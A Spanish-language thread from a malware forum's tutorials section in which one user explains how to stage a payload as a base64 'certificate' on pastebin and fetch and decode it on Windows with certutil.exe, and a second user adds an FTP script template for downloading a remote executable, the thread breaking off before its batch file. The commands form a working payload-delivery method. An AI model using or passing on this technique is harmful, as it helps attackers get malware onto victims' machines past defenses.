• Downloader desde línea de comandos

  • Aquí puedes postear manuales referentes a malware y herramientas relativas a la tematica del foro.
Aquí puedes postear manuales referentes a malware y herramientas relativas a la tematica del foro.
 #495066  por Blau
 10 Ago 2019, 12:01
Hola, hace poco un usuario del servidor de Discord del foro ([ Debe registrarse para ver este enlace ], os invito a uniros) pidió ayuda sobre un downloader a través de FTP y recordé que hace poco salió un método nuevo para descargar archivos usando herramientas nativas de windows. Conocí esta técnica mediante [ Debe registrarse para ver este enlace ] pero parece ser que se está usando desde hace más tiempo.

El funcionamiento es sencillo, con el siguiente comando se codificará el archivo a base64 como si fuera un certificado:
Código: [ Debe registrarse para ver este enlace ]
certutil.exe -f -encode payload.exe payload.enc
payload.exe es el archivo de entrada (vuestro payload) y payload.enc es el archivo de salida.

Una vez codificado el archivo, hay que abrirlo con vuestro editor de textos favorito (menos el bloc de notas de Windows, por favor...), copiar el contenido y alojarlo en cualquier servicio para compartir textos, yo usaré pastebin, ya que permite compartir el archivo en texto plano (raw). Una vez subido el archivo a pastebin o cualquier otro servicio, copiad el enlace al archivo plano ([ Debe registrarse para ver este enlace ] en mi caso) y usando los siguientes comandos se descargará:
Código: [ Debe registrarse para ver este enlace ]
certutil.exe -urlcache -split -f "https://pastebin.com/raw/VKZVUHBH" payload.download
payload.download es el archivo descargado en forma de certificado codificado en base64.

Para decodificar este archivo, hay que usar el siguiente comando:
Código: [ Debe registrarse para ver este enlace ]
certutil.exe -decode payload.download payload_dl.exe
payload.download es el nombre del archivo que habéis puesto en el comando anterior y payload_dl.exe es el nombre final del archivo descargado (vuestro payload).

Si todo se ha ejecutado correctamente, los archivos payload.exe y payload_dl.exe deberían ser idénticos.

Os dejo un enlace a los archivos usados: [ Debe registrarse para ver este enlace ]

NOTA
Parece ser que Windows Defender se ha actualizado para detener este método
 #495068  por s1g1lo
 10 Ago 2019, 23:04
Sos un grande Blau gracias por el tuto voy a probarlo ahora mismo. Yo soy el usuario que preguntaba en el chat (Gauss). Habia intentado algo parecido con bitsadmin pero no estaba seguro si iba a funcionar en todos los windows, por eso se me ocurrio descargar por ftp, lo cual funciona bastante bien. Lo dejo a continuacion por si a alguien le sirve.

Es facil... Creas un archivo .txt   En mi caso data.txt y le agregan el siguiente texto.
Código: [ Debe registrarse para ver este enlace ]
open ipdelhostftp
tuUser
tuPASS
binary
get /RutaRemotaDelArchivo/Archivo.exe
bye
Luego crean un .bat en la misma carpeta que data.txt y le ponen ... 

[ Debe registrarse para ver este enlace ]